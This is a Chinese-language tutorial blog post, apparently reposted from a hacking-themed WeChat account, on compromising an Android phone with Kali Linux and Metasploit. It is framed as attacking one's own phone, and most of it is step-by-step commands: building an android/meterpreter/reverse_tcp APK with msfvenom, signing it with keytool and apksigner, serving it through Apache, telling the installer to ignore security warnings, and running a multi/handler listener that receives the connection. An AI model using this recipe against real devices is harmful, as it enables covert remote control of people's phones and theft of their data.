前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Kali用Metasploit实验入侵自己的安卓手机

Kali用Metasploit实验入侵自己的安卓手机

作者头像
知识与交流
发布2023-09-18 10:12:50
9140
发布2023-09-18 10:12:50
举报
文章被收录于专栏:黑客技术家园黑客技术家园
要求电脑主机与手机在同一网段连接在同一wifi下

方法在kali的网络适配器下选择桥接模式,选择后输入dhclient重新分发IP此后就会在同一网段

对于我kali2021 IP:192.168.1.10 手机IP:192.168.1.7

开始

一.生成apk应用

使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。

lhost=192.168.1.10这是Kali的IP&lport=4444 默认4444;可以自定义chmod使其权限够大

代码语言:javascript
复制
1 | msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 R > 1.apk

此时已经看到应用。之后我们需要用到的软件有三个zipalign, keytool , apksigner对t.apk文件进行优化对齐然后签名

2.使用zipalign对apk进行对齐

代码语言:javascript
复制
1 | apt-get install zipalign

kali默认有keytool;我们自行安装zipalign.

如果出现该报错,只需将你的路径返回至 .apk应用路径。

3,生成密钥对

代码语言:javascript
复制
生成密钥对: keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000 解释: keytool -genkeypair -keystore 密钥库名 -alias 密钥别名 -validity 天数 -keyalg RSA

4.对apk签名

代码语言:javascript
复制
签名: apksigner sign --ks cg.keystore --ks-key-alias cg 11.apk 解释: apksigner sign --ks 密钥库名 --ks-key-alias 密钥别名 tz.apk
代码语言:javascript
复制
apt-get install apksigner

5,对apk进行签名验证

代码语言:javascript
复制
apksigner verify -v --print-certs 11.apk

到这里我们已经完成了安卓手机的应用制作木木只要把它传到手机里安装就行。忽略所有的安全提示直接安装。

二.手机下载apk

注意可以先不用下载在进行完第三步时在下载

方法一在kali下找到文件发送至好友进行下载即可

方法二

代码语言:javascript
复制
cp 11.apk /var/www/html
代码语言:javascript
复制
vi /var/www/html/index.html

找到此处按i进入插入模式添加这一行然后esc输入:wq保存并退出

这时候手机输入你kali的ip就能访问下载这个apk文件了。

可能出现的问题

1.访问本机ip失败显示服务器连接不成功

解决在kali中开启网络服务 systemctl restart networking

开启apache服务 service apache2 start

三启动动msfconsole设置payload监听

如下:

  1. msfconsole
  2. msf6 > use exploit/multi/handler
  3. [*] Using configured payload generic/shell_reverse_tcp
  4. msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
  5. payload => android/meterpreter/reverse_tcp
  6. msf6 exploit(multi/handler) > show options
  7. Module options (exploit/multi/handler):
  8. Name Current Setting Required Description
  9. ---- --------------- -------- -----------
  10. Payload options (android/meterpreter/reverse_tcp):
  11. Name Current Setting Required Description
  12. ---- --------------- -------- -----------
  13. LHOST yes The listen address (an interface may be specified)
  14. LPORT 4444 yes The listen port
  15. Exploit target:
  16. Id Name
  17. -- ----
  18. 0 Wildcard Target
  19. msf6 exploit(multi/handler) > set LHOST 192.168.1.10
  20. LHOST => 192.168.1.10
  21. msf6 exploit(multi/handler) > exploit

到这里手机那边安装好11.apk之后并打开,这边kali就自动连接上了。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2023-06-04 20:51,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 黑客技术家园 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档